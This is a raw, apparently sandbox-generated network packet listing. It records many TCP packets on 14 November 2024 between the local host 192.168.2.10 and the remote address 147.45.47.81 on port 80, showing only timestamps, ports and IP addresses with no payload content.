                                                                                                                                                                                                            Nov 14, 2024 12:20:00.597395897 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.597405910 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.597417116 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.597428083 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.597439051 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.597450018 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.597470045 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.597481012 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.597491980 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.597501993 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.597517967 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.597532034 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.597544909 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.597557068 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.597567081 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.597579956 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.597594023 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.597604990 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.597623110 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.597635031 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.597645044 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.597656965 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.597668886 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.597681999 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.597681999 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.597681999 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.597681999 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.597681999 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.597681999 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.597681999 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.597681999 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.597681999 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.597692966 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.597701073 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.597701073 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.597701073 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.597701073 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.597701073 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.597701073 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.597701073 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.597701073 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.597707987 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.597714901 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.599340916 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.601962090 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.608803034 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.608829975 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.608841896 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.608850956 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.611345053 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.611345053 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.611345053 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.611620903 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.612340927 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.612354994 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.612365007 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.612381935 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.612391949 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.612401962 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.612412930 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.612422943 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.612432957 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.612492085 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.612495899 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.612495899 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.612495899 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.612524986 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.612550020 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.612577915 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.612588882 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.612695932 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.612715960 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.612759113 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.612768888 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.612777948 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.612803936 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.612813950 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.612819910 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.612832069 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.612834930 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.612951994 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.612962961 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.612972975 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.612977028 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.612984896 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.613006115 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.613089085 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.613099098 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.613115072 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.613115072 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.613115072 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.613126040 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.613137007 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.613147974 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.613157988 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.613158941 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.613167048 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.613178015 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.613178015 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.613193035 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.613208055 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.613219023 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.613219023 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.613229990 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.613253117 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.613301039 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.613312006 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.613321066 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.613323927 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.613331079 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.613342047 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.613344908 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.613352060 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.613363981 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.613373041 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.613543034 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.613555908 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.613564968 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.613640070 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.613663912 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.613682985 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.613693953 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.613801956 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.613812923 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.613822937 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.613826036 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.613835096 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.613845110 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.613847017 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.613854885 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.613866091 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.613888979 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.613950014 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.613960028 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.613976002 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.613986969 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.614002943 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.614003897 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.614012957 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.614023924 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.614033937 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.614033937 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.614043951 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.614053965 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.614054918 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.614063025 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.614065886 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.614074945 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.614084959 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.614085913 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.614095926 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.614106894 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.614116907 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.614118099 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.614129066 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.614151001 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.614151955 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.614162922 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.614172935 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.614175081 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.614183903 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.614193916 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.614198923 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.614203930 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.614213943 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.614224911 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.614236116 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.614239931 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.614254951 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.614272118 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.614280939 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.614289999 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.614294052 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.614300966 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.614310980 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.614312887 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.614321947 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.614341974 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.614478111 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.614487886 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.614501953 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.614516973 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.614527941 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.614538908 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.614541054 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.614559889 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.614648104 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.614659071 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.614669085 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.614670992 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.614679098 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.614689112 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.614698887 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.614712954 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.614716053 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.614728928 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.614738941 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.614742041 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.614749908 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.614759922 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.614770889 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.614787102 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.614813089 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.614813089 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.614845037 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.614861965 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.614871979 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.614962101 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.614972115 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.614983082 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.614985943 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.614993095 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.615004063 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.615015030 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.615026951 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.615039110 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.615091085 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.615103006 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.615112066 CET8049957147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.615123987 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.615134001 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.615149975 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.615159988 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.615170002 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.615180969 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.615190983 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.615194082 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.615194082 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.615207911 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.615219116 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.615230083 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.615230083 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.615230083 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.615241051 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.615263939 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.615339994 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.615344048 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.615344048 CET4995780192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.615351915 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.615351915 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.615358114 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.615369081 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.615387917 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.615402937 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.615410089 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.615413904 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.615425110 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.615436077 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.615436077 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.615446091 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.615456104 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.615457058 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.615467072 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.615477085 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.615487099 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.615492105 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.615497112 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.615509987 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.615516901 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.615518093 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.615520954 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.615531921 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.615541935 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.615551949 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.615561962 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.615566969 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.615583897 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.615600109 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.615611076 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.615619898 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.615626097 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.615636110 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.615643024 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.615647078 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.615657091 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.615667105 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.615677118 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.615684032 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.615778923 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.615788937 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.615798950 CET8049958147.45.47.81192.168.2.10
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.615806103 CET4995880192.168.2.10147.45.47.81
                                                                                                                                                                                                            Nov 14, 2024 12:20:00.615811110 CET8049958147.45.47.81192.168.2.10
